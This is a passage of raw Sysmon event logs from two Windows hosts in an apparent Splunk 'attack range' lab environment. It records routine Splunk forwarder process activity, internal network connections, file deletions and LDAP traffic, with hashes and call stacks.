Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298615Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:01.431{C8EA50B7-1915-6216-5A07-000000003802}3164C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000222490Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:58.511{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51719-false10.0.1.12-8000- 23542300x8000000000000000298633Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:02.947{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFFFC0DA282813D169056BC3CDB3BAA5,SHA256=337E1C40F18EFA7A0140EAC152688B7B34298E3B75A8994065720E68A31CFFFD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298632Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:02.363{C8EA50B7-1916-6216-5B07-000000003802}60966872C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298631Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:02.030{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1916-6216-5B07-000000003802}6096C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298630Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:02.030{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298629Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:02.030{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298628Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:02.030{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298627Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:02.030{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298626Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:02.030{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1916-6216-5B07-000000003802}6096C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298625Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:02.030{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1916-6216-5B07-000000003802}6096C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298624Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:02.031{C8EA50B7-1916-6216-5B07-000000003802}6096C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000222491Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:02.025{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6AE3DD915240C8C79FFE241DB4617889,SHA256=FA15BD3EBC23790CEC1DFF0301CE8933C9086A8D5F9919AD4BF31CBD9CAC6112,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222492Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:03.149{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9B57D788043CC6CF457CADBD8D44828,SHA256=D9098D7C6DB634EB971E531653190C234B4FE923D8F38C758E2300C88D0B03BC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298641Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:03.746{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1917-6216-5C07-000000003802}6928C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298640Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:03.746{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298639Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:03.746{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298638Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:03.746{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298637Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:03.746{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298636Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:03.746{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1917-6216-5C07-000000003802}6928C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298635Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:03.746{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1917-6216-5C07-000000003802}6928C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298634Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:03.751{C8EA50B7-1917-6216-5C07-000000003802}6928C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000298643Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:04.649{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-165MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298642Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:04.032{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DADC11B705D164838CB4C70316846433,SHA256=182DF665BB3D87A0DE513AEB574F93B39935FC2198E5BF4CE3BDB403BFA196EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222493Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:04.149{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05FBD9A4551A884EBFB11C1C9A4B5964,SHA256=A4D9FAEE8CC718D2D9B98C919B1EC48F5D31AFB48A30B25E587BD6D061CEC002,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222494Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:05.165{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF90C6BD7A4EFB5BD993D7F02EB861D4,SHA256=4C9503BF19B549CE0B4C689D6639606C2A5CC880751783CCFA8CA0B0CE792F51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298646Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:05.662{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-166MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298645Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:05.042{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4357662EE91B8793574FF67D091F47F1,SHA256=C288D88E9FFBDA0495277B1226DFE31BC70C006139F1A12853C1E20C5A205ECC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298644Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:02.597{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49548-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000222496Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:04.542{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51720-false10.0.1.12-8000- 23542300x8000000000000000222495Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:06.181{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D90C96FEEEA85DF4BE1484D50B3A1EFB,SHA256=C79AE88D83025E09678038DE75F1EFCD5CACDCB87ED39B4E9F71D164345A303E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298649Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:06.057{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC01E08C50C4CC16004FE54F632AF7C1,SHA256=C79F2D082746AA1C0D3704F423D119BCCE636B38C36CCEE4349FEBA7BFFE893B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298648Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:03.559{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49549-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000298647Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:03.559{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49549-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000222497Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:07.196{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05AE5CCA47BA9FB13B470EDE8F567465,SHA256=E78316D47EBC0CC9CE04D6FC0FBFD11FA626951FDD474E90A65D3878EF474CD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298650Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:07.073{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36E23BD8379A25C89A820783E4E99ED4,SHA256=DA55F32F549A90EA254227FC52EBCFEDC557F4A0FEACAB92AEFAB998F782CAE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222498Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 